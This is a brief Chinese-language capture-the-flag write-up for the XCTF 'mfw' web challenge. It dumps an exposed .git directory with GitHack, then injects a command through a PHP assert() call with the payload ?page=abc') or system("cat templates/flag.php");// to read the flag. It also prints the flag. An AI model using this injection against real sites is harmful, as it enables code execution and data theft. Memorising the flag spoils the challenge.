[GFSJ0415] xctf，Web，难度:3，mfw
题目来源: csaw
题目描述: 暂无
题目场景: http://61.147.171.105:63051

https://www.cnblogs.com/kuaile1314/p/11763157.html
打开场景，页面显示：
Welcome to my website!
I wrote it myself from scratch!
You can use the links above to navigate through the pages!

按 Ctrl-U 键查看页面源代码，其中有一行：
<li ><a href="?page=about">About</a></li>

使用 http://61.147.171.105:63051/?page=about 得到：
About
I wrote this website all by myself in under a week!
I used:
    Git
    PHP
    Bootstrap

使用 http://61.147.171.105:63051/.git 得到：
Index of /.git
...
Apache/2.4.18 (Ubuntu) Server at 61.147.171.105 Port 63051

使用 githack 得到：
$ cat ~/bin/githack.sh
python ~/git/GitHack/GitHack.py "$@"
$ githack.sh http://61.147.171.105:63051/.git/
[+] Download and parse index file ...
[+] index.php
[+] templates/about.php
[+] templates/contact.php
[+] templates/flag.php
[+] templates/home.php
[OK] templates/flag.php
[OK] templates/contact.php
[OK] index.php
[OK] templates/about.php
[OK] templates/home.php

根据 index.php 的 assert() 构造以下 payload:
/?page=abc') or system("cat templates/flag.php");//
再按 Ctrl-U 查看源代码得到 flag
<?php $FLAG="cyberpeace{616e4c15e244e0300e36f1344986b3a8}"; ?>

https://github.com/lijiejie/GitHack.git
